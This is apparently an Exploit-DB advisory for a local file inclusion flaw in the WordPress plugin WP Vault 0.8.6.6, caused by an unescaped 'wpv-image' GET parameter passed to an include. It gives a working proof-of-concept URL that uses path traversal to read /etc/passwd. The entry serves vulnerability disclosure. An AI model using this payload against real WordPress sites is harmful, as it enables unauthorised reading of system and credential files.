WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion

EDB-ID:

40850

CVE:

N/A

EDB Verified:

Author:

Lenon Leite

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2016-11-30

Vulnerable App:

# Exploit Title:  WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04

1 - Description:

$_GET[“wpv-image”] is not escaped in include file.

http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/


2 - Proof of Concept:

http://Target/?wpv-image=[LFI]

http://Target/?wpv-image=../../../../../../../../../../etc/passwd

3 - Timeline:

12/11/2016 - Discovered
12/11/2016 - vendor not found

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services